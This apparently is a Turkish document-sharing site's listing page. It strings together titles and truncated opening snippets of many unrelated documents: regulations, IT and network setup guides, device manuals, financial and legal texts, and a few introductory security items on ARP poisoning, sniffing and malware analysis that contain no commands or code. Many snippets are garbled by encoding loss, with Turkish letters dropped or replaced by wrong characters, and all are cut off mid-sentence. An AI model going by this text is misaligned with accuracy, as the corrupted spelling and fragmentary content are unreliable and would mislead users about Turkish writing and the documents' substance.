TÜRK YE B L MSEL VE TEKNOLOJ K ARAfiTIRMA KURUMU DESTEK PROGRAMLARI BAfiKANLIKLARI KURULUfi, GÖREV, YETK VE ÇALIfiMA ESASLARINA L fik N YÖNETMEL K (*) TÜRK YE B L MSEL VE TEKNOLOJ K ARAfiTIRMA KURUMU DESTEK PROGRAMLARI BAfiKANLIKLARI KURULUfi, GÖREV, YETK VE ÇALIfiMA ESASLARINA L fik N YÖNETMEL K (*) Amaç ve Kapsam Madde 1- Bu Yönetmelik, Türkiye Bilimsel

Detaylı

5651 SAYILI YASANIN GEREKLER N TRCwifiZone LE UYGULAYIN

5651 SAYILI YASANIN GEREKLER N TRCwifiZone LE UYGULAYIN Her Yerden Kolay Internet Eriflimi ve Çözümleri 5651 SAYILI YASANIN GEREKLER N TRCwifiZone LE UYGULAYIN nternet Servisiniz Kontrolünüz Alt nda TRCwifiZone Nedir? TRCwifiZone; kablolu veya kablosuz internet

Detaylı

WINDOWS SERVER 2008 R2 YE G R

WINDOWS SERVER 2008 R2 YE G R Ç NDEK LER 1 WINDOWS SERVER 2008 R2 YE G R fi 1 Temel Bilgiler 1 R2 deki Yenilikler 2 R2 SP1 deki Yenilikler 4 Sürümler 5 Yönetimsel Araçlar 9 Sunucu Yöneticisi (Server Manager) 9 Windows PowerShell 10

Detaylı

Merak serverı MS Exchange için Antispam ve AntiVirus olarak nasıl kullanabiliriz?

Merak serverı MS Exchange için Antispam ve AntiVirus olarak nasıl kullanabiliriz? Merak serverı MS Exchange için Antispam ve AntiVirus olarak nasıl kullanabiliriz? Neden bunu yapmak istiyorum? MS Exchange Sunucusunun internete doğrudan bağlanmasının onunu kesmek, daha iyi bir güvenlik

Detaylı

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM 1. Sistem 3 bileşenden oluşur a. Sunucu b. Koruma yazılımı c. Mobil anahtar ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM Sunucu yazılımı: sunucu yazılımı öncelikle yerel ağda et (etkileşimli tahtaların) bağlı

Detaylı

BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal

BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal müzeler vb.) Bilgi ve iletişim teknolojileri, bilgiye

Detaylı

SQL Server'ı Uzaktan Bağlantı İçin Ayarlamak

SQL Server'ı Uzaktan Bağlantı İçin Ayarlamak Microsoft SQL Server?a uzaktaki bir bilgisayardan bağlanmak için tek yapmanız gereken, SQL Server Manager?da makinenin adı, kullanıcı adı ve şifreyi girmek veya programdaki connection stringi değiştirmek

Detaylı

İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri

İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri Kullanıcı Kılavuzu Telif Hakkı 2006 Hewlett-Packard Development Company, L.P. Microsoft ve Windows, Microsoft Corporation kuruluşunun ABD'de

Detaylı

Tor Üzerinden VPN Servisi "Privatoria"

Tor Üzerinden VPN Servisi Privatoria Tor Üzerinden VPN Servisi "Privatoria" Geçtiğimiz günlerde ortaya çıkan yeni bir oluşum internette güvenli gezinme yöntemlerimiz arasına bir yenisini daha ekledi. Privatoria adıyla yayın hayatına başlayan

Detaylı

htiyaç Duydu unuz Herfley

htiyaç Duydu unuz Herfley Daha Fazla Daha yi Daha Kolay Güvenlik Yeni Nesil Güvenlik Çözümleri ile htiyaç Duydu unuz Herfley Application Control Sosyal a lar, video paylafl m siteleri ve benzeri di er web uygulamalar ifl araçlar

Detaylı

Merkezi Sterilizasyon Ünitesinde Hizmet çi E itim Uygulamalar

Merkezi Sterilizasyon Ünitesinde Hizmet çi E itim Uygulamalar Merkezi Sterilizasyon Ünitesinde Hizmet çi E itim Uygulamalar Hmfl. Sevgili GÜREL Emekli, Ac badem Sa l k Grubu Ac badem Hastanesi, Merkezi Sterilizasyon Ünitesi, STANBUL e-posta: sgurkan@asg.com.tr H

Detaylı

S STEM VE SÜREÇ DENET M NDE KARfiILAfiILAN SORUNLAR VE ÇÖZÜM ÖNER LER

S STEM VE SÜREÇ DENET M NDE KARfiILAfiILAN SORUNLAR VE ÇÖZÜM ÖNER LER S STEM VE SÜREÇ DENET M NDE KARfiILAfiILAN SORUNLAR VE ÇÖZÜM ÖNER LER Erol LENGERL / Akis Ba ms z Denetim ve SMMM A.fi. 473 474 2. Salon - Paralel Oturum VIII - Sistem ve Süreç Denetiminde Karfl lafl lan

Detaylı

Android Uygulamalarında Güvenlik Testi

Android Uygulamalarında Güvenlik Testi Android Uygulamalarında Güvenlik Testi Şubat ayında Gartner tarafından yayımlanan bir rapora göre dünya genelinde 2011 yılının 4. çeyreğinde satılan akıllı telefonların %50.9 unda Android işletim sisteminin,

Detaylı

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları 1. MAC adresleri kaç byte dır? 2. Aşağıdaki MAC adresi hangi firmaya aittir. 00:03:6C:1c:2c:3d 3. TCP SYN paketi kaç byte dır? 4. 100

Detaylı

Özgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net

Özgür Yazılımlar ile VoIP Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Özgür Yazılımlar ile VoIP Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Konular VoIP Güvenliği VoIP Güvenlik Denetim Süreci Denetim Kapsamının Belirlenmesi Ağ Altyapısı Analizi

Detaylı

Pfsense kurulum için gereken cd iso imajını http://www.pfsense.org/mirror.php?section=downloads adresinden indirebilirsiniz.

Pfsense kurulum için gereken cd iso imajını http://www.pfsense.org/mirror.php?section=downloads adresinden indirebilirsiniz. Pfsense Kurulum ve ilk Ayarlar Sistem güvenliği ve kullanıcıların kontrol altında tutulması için piyasada bir çok firewall ve benzeri gerek donanımsal gerekse yazılımsal olarak bir çok ürün bulunmaktadır.

Detaylı

Man In The Middle Attack Ve ARP Poisoning

Man In The Middle Attack Ve ARP Poisoning Man In The Middle Attack Ve ARP Poisoning ARP POSINING ARP Poisoning, ARP zehirleme anlamına gelmektedir. ARP protokolünün temel çalışmasındaki zaafiyetleri kullanarak gerçekleştirilir. ARP (Adress Resolution

Detaylı

Digifresh Kullanım Kılavuzu

Digifresh Kullanım Kılavuzu DigiFresh programını çalıştırmadan önce bilgisayarınıza Net Framework kütüphanesinin yüklü olması gerekmektedir. Aşağıdaki linkten indirelebilir. http://www.microsoft.com/tr-tr/download/confirmation.aspx?id=17851

Detaylı

USB KVM Switch. Ses özellikli ve 2 portlu USB KVM switch. Ses özellikli ve 4 portlu USB KVM switch

USB KVM Switch. Ses özellikli ve 2 portlu USB KVM switch. Ses özellikli ve 4 portlu USB KVM switch USB KVM Switch Ses özellikli ve 2 portlu USB KVM switch Ses özellikli ve 4 portlu USB KVM switch Kullanma Kılavuzu DS-11403 (2 Portlu) DS-12402 (4 Portlu) 1 NOT Bu cihaz FCC kurallarının 15. Bölümü uyarınca,

Detaylı

MSSQL Server 2000 Kurulumu

MSSQL Server 2000 Kurulumu MSSQL Server 2000 Kurulumu MSSQL Server 2000 Kurulumu ile ilgili işlem adımları Kurulum hazırlıkları : SQL Server 2000 in sistem ihtiyaçları gözden geçirilmelidir. Aşağıdaki tablo bu ürünün standart donanım

Detaylı

Autodesk Building Design Suite 2012. Sorular ve Cevapları

Autodesk Building Design Suite 2012. Sorular ve Cevapları Autodesk Building Design Suite 2012 Sorular ve Cevapları Autodesk Building Design Suite 2012 yazılımı, daha etkin tasarım yapmanıza ve iletişim kurmanıza yardım eder. Ödediğiniz fiyat karşılığında mükemmel

Detaylı

Bellek Analizi ile Zararlı Yazılım Analizi

Bellek Analizi ile Zararlı Yazılım Analizi Bellek Analizi ile Zararlı Yazılım Analizi Yine bir gün twitter.com/hack4career hesabından duyurulan hack edilmiş ve/veya zararlı yazılım barındıran web sitelerine göz atarken gün aşırı tespit edilen,

Detaylı

dan flman teslim ald evraklar inceledikten sonra nsan Kaynaklar Müdürlü ü/birimine gönderir.

dan flman teslim ald evraklar inceledikten sonra nsan Kaynaklar Müdürlü ü/birimine gönderir. TÜB TAK BAfiKANLIK, MERKEZ VE ENST TÜLERDE ÇALIfiIRKEN YÜKSEK L SANS VE DOKTORA Ö REN M YAPANLARA UYGULANACAK ESASLAR (*) Amaç ve Kapsam Madde 1- Bu Esaslar n amac ; Türkiye Bilimsel ve Teknolojik Araflt

Detaylı

KolayOfis Başlangıç Rehberi Kısa Mesaj Yönetimi

KolayOfis Başlangıç Rehberi Kısa Mesaj Yönetimi 1 İçindekiler KolayOfis e Hoş Geldiniz Sözleşme İmza İşleminin Tamamlanması Kullanıcı Bilgilerinin Hazırlanması Destek Hizmeti Kısa Mesaj Yönetimi Duruşma, Ara Karar ve İş Planı Bilgilendirmesi Duruşma,

Detaylı

İNTERNETE NASIL BAĞLANILIR?

İNTERNETE NASIL BAĞLANILIR? İNTERNET İNTERNET NEDİR? İki veya daha fazla bilgisayarın birbirine bağlanması ile oluşturulan bilgisayar ağına yerel ağ denir. Birden fazla bilgisayarın veya yerel bilgisayarların bağlı olduğu ağların

Detaylı

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM 18.8.2014 ANET YAZILIM LOG YÖNETİMİ Karşılaştırma Tablosu ANET YAZILIM ANET LOG COLLECTOR SAFELOG CSL SureLog/Fauna SureSec Agent Gereksinimi Yok Yok Yok Yok Yok Anlık Hash ve Zaman Damgası Evet Evet Evet

Detaylı

ELEKTRONĐK TĐCARETĐN DÜZENLENMESĐ KANUNU 1 MAYIS 2015 TE YÜRÜRLÜĞE GĐRDĐ

ELEKTRONĐK TĐCARETĐN DÜZENLENMESĐ KANUNU 1 MAYIS 2015 TE YÜRÜRLÜĞE GĐRDĐ 30.04.2015 ELEKTRONĐK TĐCARETĐN DÜZENLENMESĐ KANUNU 1 MAYIS 2015 TE YÜRÜRLÜĞE GĐRDĐ 20 SORUDA YENĐ KANUN: 1. Kanun ne zaman yürürlüğe girmektedir? 23 Ekim 2014 tarihinde Resmi Gazete de yayımlanan Kanun;

Detaylı

2. Projelerle bütçe formatlar n bütünlefltirme

2. Projelerle bütçe formatlar n bütünlefltirme 2. Projelerle bütçe formatlar n bütünlefltirme Proje bütçesi haz rlarken dikkat edilmesi gereken üç aflama vard r. Bu aflamalar flunlard r: Kaynak belirleme ve bütçe tasla n n haz rlanmas Piyasa araflt

Detaylı

Tasarım Raporu. Grup İsmi. Yasemin ÇALIK, Fatih KAÇAK. Kısa Özet

Tasarım Raporu. Grup İsmi. Yasemin ÇALIK, Fatih KAÇAK. Kısa Özet Tasarım Raporu Grup İsmi Yasemin ÇALIK, Fatih KAÇAK Kısa Özet Tasarım raporumuzda öncelikle amacımızı belirledik. Otomasyonumuzun ana taslağını nasıl oluşturduğumuzu ve bu süreçte neler yaptığımıza karar

Detaylı

Windows VISTA Ultimate Kurulumu ve Yönetimi

Windows VISTA Ultimate Kurulumu ve Yönetimi Windows VISTA Ultimate Kurulumu ve Yönetimi Windows Vista Ultimate, Vista'nın tüm özelliklerini içinde barındırıyor ve en pahalısürüm olarak listede yerini alıyor. SİSTEM GEREKSİNİMLERİ 1 GHz 32-bit işlemci

Detaylı

5/8 Bağlantı Noktalı Gigabit Ethernet Anahtarı

5/8 Bağlantı Noktalı Gigabit Ethernet Anahtarı 5/8 Bağlantı Noktalı Gigabit Ethernet Anahtarı Kullanım Kılavuzu Onay FCC Beyanı Bu test edilmiş ve FCC Kuralları Kısım 15 de belirtilen teknik özelliklere göre B Sınıfı aygıtların sınırları ile uyumlu

Detaylı

www.mercedes-benz.com.tr Mercedes-Benz Orijinal Ya lar

www.mercedes-benz.com.tr Mercedes-Benz Orijinal Ya lar www.mercedes-benz.com.tr Mercedes-Benz Orijinal Ya lar Kazand ran Güç Mercedes-Benz orijinal ya lar arac n z üreten uzmanlar taraf ndan, gelifltirilmifltir. Mercedes-Benz in dilinden en iyi Mercedes-Benz

Detaylı

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ

HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ KOKLAYICILAR: Sniffing Nedir? Sniffing türkçe anlamı ile koklama bilgi güvenliğinde giden gelen veriyi araya girerek ele geçirmektir.sniffing'in

Detaylı

HAKKIMIZDA. Misyonumuz; Vizyonumuz;

HAKKIMIZDA. Misyonumuz; Vizyonumuz; HAKKIMIZDA SOFTKEY kurumsal teknoloji hizmetlerinde, müşteri odaklı yaklaşımı, rekabetçi fiyatları ve eksiksiz destek hizmeti sunmak amacıyla kurulmuştur. Sektörün önde gelen teknoloji firmaları ile iş

Detaylı

Ç NDEK LER G R fi 1 Bafllamadan Önce 1 Kitab Kimler Okumal? 1 Kitap çerisindeki Örnekler 2 Örneklerin Kullan m 3 Çekinmeden Yaz n 7

Ç NDEK LER G R fi 1 Bafllamadan Önce 1 Kitab Kimler Okumal? 1 Kitap çerisindeki Örnekler 2 Örneklerin Kullan m 3 Çekinmeden Yaz n 7 +AS3-icindekiler 4/13/10 10:51 PM Page ix Ç NDEK LER G R fi 1 Bafllamadan Önce 1 Kitab Kimler Okumal? 1 Kitap çerisindeki Örnekler 2 Örneklerin Kullan m 3 Çekinmeden Yaz n 7 1 PROGRAMLAMAYA G R fi 9 Programlama

Detaylı

ISI At f Dizinlerine Derginizi Kazand rman z çin Öneriler

ISI At f Dizinlerine Derginizi Kazand rman z çin Öneriler ISI At f Dizinlerine Derginizi Kazand rman z çin Öneriler Metin TUNÇ Seçici Olun ISI' n editoryal çal flanlar her y l yaklafl k olarak 2,000 dergiyi de erlendirmeye tabi tutmaktad r. Fakat de erlendirilen

Detaylı

MikroÖdeme Servis Dökümanı

MikroÖdeme Servis Dökümanı MikroÖdeme Servis Dökümanı 1 TurkcellMobilÖdeme Nedir? TurkcellMobilÖdeme 36 milyonu aşkın Turkcell kullanıcısının cep telefonlarını kullanarak, sadece bir SMS ile, pratik bir şekilde ödeme yapmasına olanak

Detaylı

Gmail Outlook Ayarları (Türkçe Resimli Anlatım)

Gmail Outlook Ayarları (Türkçe Resimli Anlatım) Gmail Outlook Ayarları (Türkçe Resimli Anlatım) 1.Adım: Gmail üzerinden e-posta hesabınıza herhangi bir tarayıcıdan http://mail.maltepe.edu.tr linkine tıklayıp daha önceden kullandığınız e-posta hesabınızı

Detaylı

Uzem Eğitmen Girişi. Şekil 1. Sisteme girdikten sonra Şekil 2 deki ekran karşımıza çıkacak. Bu ekrandaki adımları kısaca tanıyalım.

Uzem Eğitmen Girişi. Şekil 1. Sisteme girdikten sonra Şekil 2 deki ekran karşımıza çıkacak. Bu ekrandaki adımları kısaca tanıyalım. Uzem Eğitmen Girişi Sisteme eğitmen olarak giriş yapabilmek için http://uzem.uskudar.edu.tr adresini internet tarayıcımızın adres satırına yazdıktan sonra Şekil 1 deki ekranda ilgili alanlara kullanıcı

Detaylı

Kendimiz Yapal m. Yavuz Erol* 16 Sütunlu Kayan Yaz

Kendimiz Yapal m. Yavuz Erol* 16 Sütunlu Kayan Yaz Kendimiz Yapal m Yavuz Erol* 16 Sütunlu Kayan Yaz Bu yaz da 8 sat r, 16 sütundan oluflan LED li kayan yaz projesi anlat l yor. Projenin en önemli özelli i gerek donan m gerekse yaz l m olarak basit olmas.

Detaylı

META TRADER 4 MOBİL İŞLEM PLATFORMLARI KULLANMA KILAVUZU 1. KURULUM

META TRADER 4 MOBİL İŞLEM PLATFORMLARI KULLANMA KILAVUZU 1. KURULUM META TRADER 4 MOBİL İŞLEM PLATFORMLARI KULLANMA KILAVUZU 1. KURULUM Meta Trader 4 mobil işlem platformunu cihazınıza kurmak için öncelikle uygulama marketine giriş yapmanız gerekmektedir. Girişin ardından

Detaylı

MAKÜ YAZ OKULU YARDIM DOKÜMANI 1. Yaz Okulu Ön Hazırlık İşlemleri (Yaz Dönemi Oidb tarafından aktifleştirildikten sonra) Son aktif ders kodlarının

MAKÜ YAZ OKULU YARDIM DOKÜMANI 1. Yaz Okulu Ön Hazırlık İşlemleri (Yaz Dönemi Oidb tarafından aktifleştirildikten sonra) Son aktif ders kodlarının MAKÜ YAZ OKULU YARDIM DOKÜMANI 1. Yaz Okulu Ön Hazırlık İşlemleri (Yaz Dönemi Oidb tarafından aktifleştirildikten sonra) Son aktif ders kodlarının bağlantıları kontrol edilir. Güz ve Bahar dönemindeki

Detaylı

MITEL IP TELEFON SİSTEMLERİ

MITEL IP TELEFON SİSTEMLERİ MITEL IP TELEFON SİSTEMLERİ ÜNVANI MERKEZ ADRESİ : KDZ ELEKTRONİK VE TELEKOMÜNİKASYON İLETİŞİM SİST. A.Ş. : : Kavacık Mah.Çavuşbaşı Caddesi Şehit Teğmen Ali Yılmaz Sokak.Mayıs Aptartmanı No:32 / 14 Kavacık

Detaylı

Anonim Verilerin Lenovo ile Paylaşılması. İçindekiler. Harmony

Anonim Verilerin Lenovo ile Paylaşılması. İçindekiler. Harmony Anonim Verilerin Lenovo ile Paylaşılması İçindekiler Anonim Verilerin Lenovo ile Paylaşılması... 1 Harmony... 1 Lenovo Companion 3.0... 2 Lenovo Customer Engagement Service... 3 Lenovo Experience Improvement

Detaylı

ÖĞRENME FAALĠYETĠ 7. 7. GELĠġMĠġ ÖZELLĠKLER

ÖĞRENME FAALĠYETĠ 7. 7. GELĠġMĠġ ÖZELLĠKLER ÖĞRENME FAALĠYETĠ 7 AMAÇ ÖĞRENME FAALĠYETĠ 7 Bu faaliyette verilen bilgiler ile hazırlamıģ olduğunuz belgeye uygun baģvuruları (Ġçindekiler Tablosu, Dipnot/sonnot, Ģekil tablosu, resim yazısı vb.) hatasız

Detaylı

Sürücü Gönder. Yönetici Kılavuzu

Sürücü Gönder. Yönetici Kılavuzu Sürücü Gönder Yönetici Kılavuzu Ocak 2013 www.lexmark.com Genel Bakış 2 Genel Bakış Sürücü Gönder, belirli bir yazıcı modelinin yazıcı sürücüsünü almanızı sağlar. Uygulama, size yükleme talimatlarını ve

Detaylı

2008 1. Çeyrek Finansal Sonuçlar. Konsolide Olmayan Veriler

2008 1. Çeyrek Finansal Sonuçlar. Konsolide Olmayan Veriler 2008 1. Çeyrek Finansal Sonuçlar Konsolide Olmayan Veriler Rakamlarla Halkbank 70 y l Kooperatif ve KOB kredilerinde 70 y ll k tecrübe ve genifl müflteri taban Halkbank n rekabette kuvvetli yönleridir.

Detaylı

KoruMail DLP. DLP Nedir? DLP Modülü Nasıl Etkinleştirilir? Şekil 1

KoruMail DLP. DLP Nedir? DLP Modülü Nasıl Etkinleştirilir? Şekil 1 DLP Nedir? Data Loss Prevention un (Veri Kaybı Önleme) kısaltması olan DLP veri güvenliğinizi sağlamak için standartlaştırılmaya çalışılan bir teknolojidir. KoruMail içerisindeki DLP modülü mime-type bazında

Detaylı

BQTEK SMS Asistan. Kullanım Kılavuzu. Doküman Versiyon: 1.0 09.05.2016 BQTEK

BQTEK SMS Asistan. Kullanım Kılavuzu. Doküman Versiyon: 1.0 09.05.2016 BQTEK Kullanım Kılavuzu Doküman Versiyon: 1.0 09.05.2016 BQTEK İçindekiler İçindekiler... 2 Genel Bilgi... 3 Uygulamanın İndirilmesi... 3 iphone için... 3 Android için... 3 Windows ve Mac için... 3 Uygulamanın

Detaylı

SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com

SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com Giriş Yönetim alanında yaşanan değişim, süreç yönetimi anlayışını ön plana çıkarmıştır. Süreç yönetimi; insan ve madde kaynaklarını

Detaylı

Digitus un alışılmış kutu tasarımı Powerline Wireless 300N Access Point in kutusu için de geçerli. Ürünün ön kısmında yeşil ve beyaz renkler

Digitus un alışılmış kutu tasarımı Powerline Wireless 300N Access Point in kutusu için de geçerli. Ürünün ön kısmında yeşil ve beyaz renkler Digitus DN-15018-1 Tanıtımını gerçekleştireceğimiz sıradaki Digitus ürünü ise Powerline Wireless 300N Access Point. Kısaca Access Point in görevini sizlere aktaralım. Bu cihazın görevini birçok bilgisayar

Detaylı

Baskı Đstemci ve Sunucuları. Sunucu. Đstemci

Baskı Đstemci ve Sunucuları. Sunucu. Đstemci Baskı Đstemci ve Sunucuları En son sabırsızlar için baskı adli yazıda FreeBSD sistemimize nasıl yazıcı yükleyebileceğimize göz atmıştık.bu yazıda ise FreeBSD sistemimizle beraber gelen programlar yardımı

Detaylı

Ulakbim Ulusal Veri Tabanlar

Ulakbim Ulusal Veri Tabanlar Ulakbim Ulusal Veri Tabanlar EBSCOhost E itimi support.ebsco.com EBSCO nun Ocak ay nda tüm EKUAL konsorsiyumu üyelerine sundu u ULAKB M Ulusal Veri Taban (UVT) tan na ho geldiniz. Bu e itimde, EBSCOhost

Detaylı

G ünümüzde bir çok firma sat fllar n artt rmak amac yla çeflitli adlar (Sat fl

G ünümüzde bir çok firma sat fllar n artt rmak amac yla çeflitli adlar (Sat fl 220 ÇEfi TL ADLARLA ÖDENEN C RO PR MLER N N VERG SEL BOYUTLARI Fatih GÜNDÜZ* I-G R fi G ünümüzde bir çok firma sat fllar n artt rmak amac yla çeflitli adlar (Sat fl Primi,Has lat Primi, Y l Sonu skontosu)

Detaylı

PROJE TEKLİF FORMU. Haydi birlikte harika bir iş çıkartalım.

PROJE TEKLİF FORMU. Haydi birlikte harika bir iş çıkartalım. Projeniz için atezer i seçtiğiniz için teşekkür ederiz. Lütfen bu formun içerisinde projenizle ilgili olan kısımları doldurun, bu projenizi daha iyi anlamamıza yardımcı olacaktır. İyi sonuçlar elde etmek

Detaylı

RAN SLÂM CUMHUR YET ANKARA KÜLTÜR MÜSTEfiARLI I WEB S TES H ZMETE AÇILDI www.irankulturevi.com

RAN SLÂM CUMHUR YET ANKARA KÜLTÜR MÜSTEfiARLI I WEB S TES H ZMETE AÇILDI www.irankulturevi.com NTERNET S TES TANITIMI RAN SLÂM CUMHUR YET ANKARA KÜLTÜR MÜSTEfiARLI I WEB S TES H ZMETE AÇILDI www.irankulturevi.com ran slâm nk lâb n n 25. y ldönümü münasebetiyle hizmete aç lan ran slâm Cumhuriyeti

Detaylı

BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI

BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI Karar Tarihi :22.02.2011 Karar No :2011/DK-10/91 Gündem Konusu :İnternetin Güvenli Kullanımı. KARAR : 5809 sayılı Kanunun 4 üncü 6 ncı ve 50 inci maddeleri

Detaylı

İşletim Sisteminin Katmanları

İşletim Sisteminin Katmanları İşletim Sistemi Bilgisayar donanımının doğrudan denetimi ve yönetiminden, temel sistem işlemlerinden ve uygulama yazılımlarını çalıştırmaktan sorumlu olan sistem yazılımıdır. Bütün diğer yazılımların belleğe,

Detaylı

AĞ ÜZERİNDEN YAZICI ve TARAYICI TANIMLAMA KLAVUZU

AĞ ÜZERİNDEN YAZICI ve TARAYICI TANIMLAMA KLAVUZU AĞ ÜZERİNDEN YAZICI ve TARAYICI TANIMLAMA KLAVUZU A-) DİKKAT EDİLECEK HUSUSLAR: 1-) Cihazınızın panelinden Sistem Yöneticisi menüsünden ağ ayarlarınızın yapılandırılmış olması gerekmektedir. Kurulumu yapan

Detaylı

Güvenli İnternet Teknolojileri. Kurumsal Şirket Tanıtımı

Güvenli İnternet Teknolojileri. Kurumsal Şirket Tanıtımı Güvenli İnternet Teknolojileri Kurumsal Şirket Tanıtımı - Hakkımızda - Vizyon & Misyon - Tarihçe INDEX - Faaliyetlerimiz - Marka - Hizmetlerimiz - Sistem Destek ve Uzmanlıklarımız - Kurumsal Danışmanlıklarımız

Detaylı

Hackerlar'ın Gözünden Flash Uygulamaları

Hackerlar'ın Gözünden Flash Uygulamaları Hackerlar'ın Gözünden Flash Uygulamaları Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar için yapmış olduğum sunumu kısaca yazıya dökmeye karar verdim. Ön bilgi olarak Flash kısaca web sayfalarına

Detaylı

30 > 35. nsan Kaynaklar. > nsan Kaynaklar Yönetimi > Personel E itimleri > Personel Otomasyonu

30 > 35. nsan Kaynaklar. > nsan Kaynaklar Yönetimi > Personel E itimleri > Personel Otomasyonu 30 > 35 nsan Kaynaklar > nsan Kaynaklar Yönetimi > Personel E itimleri > Personel Otomasyonu > nsan Kaynaklar Personele Göre fl De il, fle Göre Personel. stanbul Büyükflehir Belediyesi, Personele Göre

Detaylı

Mehmet TOMBAKO LU* * Hacettepe Üniversitesi, Nükleer Enerji Mühendisli i Bölümü

Mehmet TOMBAKO LU* * Hacettepe Üniversitesi, Nükleer Enerji Mühendisli i Bölümü Nükleer Santrallerde Enerji Üretimi ve Personel E itimi Mehmet TOMBAKO LU* Girifl Sürdürülebilir kalk nman n temel bileflenlerinden en önemlisinin enerji oldu unu söylemek abart l olmaz kan s nday m. Küreselleflen

Detaylı

konacak bir veya daha fazla tek hat sayfas üzerinden sistemin daha kolay ve anlafl l r olarak izlenmesi

konacak bir veya daha fazla tek hat sayfas üzerinden sistemin daha kolay ve anlafl l r olarak izlenmesi kwh ve/veya kvar) 2- Enerji kalitesi / devaml l izleme ve kontrol otomasyonu a. Enerji izleme ve kontrol b. Kontrol Otomasyonu / yük atma otomasyonu Not: Tüm bunlar n yan nda, makine otomasyonu, proses

Detaylı

MOTORLU TAfiIT SÜRÜCÜLER KURSLARINDA KATMA DE ER VERG S N DO URAN OLAY

MOTORLU TAfiIT SÜRÜCÜLER KURSLARINDA KATMA DE ER VERG S N DO URAN OLAY MOTORLU TAfiIT SÜRÜCÜLER KURSLARINDA KATMA DE ER VERG S N DO URAN OLAY brahim ERCAN * 1- GENEL B LG : Motorlu tafl t sürücüleri kurslar, 5580 say l Özel Ö retim Kurumlar Kanunu kapsam nda motorlu tafl

Detaylı

BİLGİSAYAR DONANIMI. *** Gerçekleştirdikleri görev bakımından donanım birimleri ikiye ayrılır.

BİLGİSAYAR DONANIMI. *** Gerçekleştirdikleri görev bakımından donanım birimleri ikiye ayrılır. BİLGİSAYAR DONANIMI Donanım : Bilgisayarı meydana getiren fiziksel parçalara donanım denir. Bilgisayar donanımı ikiye ayılır. 1. Dış Donanım: Bilgisayar kasasının dışında bulunan, kablolar ya da bağlantı

Detaylı

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM

18.8.2014 ANET YAZILIM LOG YÖNETİMİ. Karşılaştırma Tablosu ANET YAZILIM 18.8.2014 ANET YAZILIM LOG YÖNETİMİ Karşılaştırma Tablosu ANET YAZILIM ANET LOG COLLECTOR SAFELOG CSL SureLog SureLog(Korelasyonlu) SureSec Agent Gereksinimi Yok Yok Yok Yok Yok Yok Anlık Hash ve Zaman

Detaylı

İşletme Gelişimi Atölye Soruları

İşletme Gelişimi Atölye Soruları İşletme Gelişimi Atölye Soruları Şemsettin Akçay Satış Pazarlama ve İnovasyon Mühendisi İşletmenizi Başarıya Götüren 50 Soru! Bir gün küçük kızımız Lara (o zaman 3.5 yaşındaydı): Baba deniz gölgesi nedir,

Detaylı

ATAÇ Bilgilendirme Politikası

ATAÇ Bilgilendirme Politikası ATAÇ Bilgilendirme Politikası Amaç Bilgilendirme politikasının temel amacı, grubun genel stratejileri çerçevesinde, ATAÇ İnş. ve San. A.Ş. nin, hak ve yararlarını da gözeterek, ticari sır niteliğindeki

Detaylı

Kritik Altyapı Değerlendirmeleri

Kritik Altyapı Değerlendirmeleri Kritik Altyapı Değerlendirmeleri Kritik Altyapı Değerlendirmeleri Emerson Network Power uzmanlarınca sunulan profesyonel görüşler, altyapınızın hem bugün hem de gelecekte en iyi performansı sergilemesini

Detaylı

5651 Sayılı Kanun. 5651 Sayılı Kanun Maddesinin Amacı

5651 Sayılı Kanun. 5651 Sayılı Kanun Maddesinin Amacı 5651 Sayılı Kanun 5651 Sayılı Kanun Maddesinin Amacı Kanun maddesi internet erişiminin kontrol altına alınmasını amaçlamaktadır. Bu sayede internet üzerinden işlenen bilişim suçlarının önemli ölçüde önüne

Detaylı

performansi_olcmek 8/25/10 4:36 PM Page 1 Performans Ölçmek

performansi_olcmek 8/25/10 4:36 PM Page 1 Performans Ölçmek Performans Ölçmek Cep Yönderi Dizisi Cep Yönderi Dizisi yöneticilerin ifl yaflam nda her gün karfl laflt klar en yayg n meydan okumalara ivedi çözümler öneriyor. Dizi içinde yer alan her kitapta, güçlü

Detaylı

